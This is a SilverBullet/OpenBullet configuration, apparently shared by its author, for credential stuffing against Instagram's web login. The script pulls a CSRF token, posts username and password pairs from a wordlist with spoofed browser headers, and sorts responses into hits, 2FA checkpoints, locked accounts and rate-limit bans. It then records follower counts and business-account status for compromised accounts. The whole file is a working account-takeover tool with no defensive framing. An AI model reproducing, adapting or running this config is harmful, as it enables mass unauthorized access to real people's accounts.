[SETTINGS]
{
  "Name": "Instagram-Web-Hagasoo",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-01-09T17:35:53.5416864+03:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@Hagaso_o",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Instagram-Web-Hagasoo",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#LEN FUNCTION Length "username=<USER>&enc_password=%23PWD_INSTAGRAM_BROWSER%3a0%3a1628896342%3a<PASS>" -> VAR "LEN" 

#Get REQUEST GET "https://www.instagram.com/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#csrf_token PARSE "<SOURCE>" LR "csrf_token\":\"" "\"," -> VAR "TK" 

#Podt_Data REQUEST POST "https://www.instagram.com/accounts/login/ajax/" 
  CONTENT "username=<USER>&enc_password=%23PWD_INSTAGRAM_BROWSER%3a0%3a1628896342%3a<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.instagram.com" 
  HEADER "Origin: https://www.instagram.com" 
  HEADER "Referer: https://www.instagram.com/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Google Chrome\";v=\"96\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 
  HEADER "X-ASBD-ID: 198387" 
  HEADER "X-CSRFToken: <TK>" 
  HEADER "X-IG-App-ID: 936619743392459" 
  HEADER "X-IG-WWW-Claim: 0" 
  HEADER "X-Instagram-AJAX: c383cba0e2bf" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "authenticated\":true" 
  KEYCHAIN Failure OR 
    KEY "authenticated\":false" 
    KEY "user\":false" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "message\":\"checkpoint_required" 
    KEY "checkpoint_url\":\"/challenge" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "lock\":true" 
    KEY "To secure your account, we've reset your password." 
  KEYCHAIN Ban OR 
    KEY "Please wait a few minutes before you try again" 

#Get_Cap REQUEST GET "https://www.instagram.com/<USER>/?__a=1" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Followers PARSE "<SOURCE>" LR "edge_followed_by\":{\"count\":" "}" CreateEmpty=FALSE -> CAP "Followers" 

#is_business_account PARSE "<SOURCE>" JSON "is_business_account" CreateEmpty=FALSE -> CAP "Is_business_account" 

#Author FUNCTION Constant "@Hagaso_o" -> CAP "ConfigBy" 

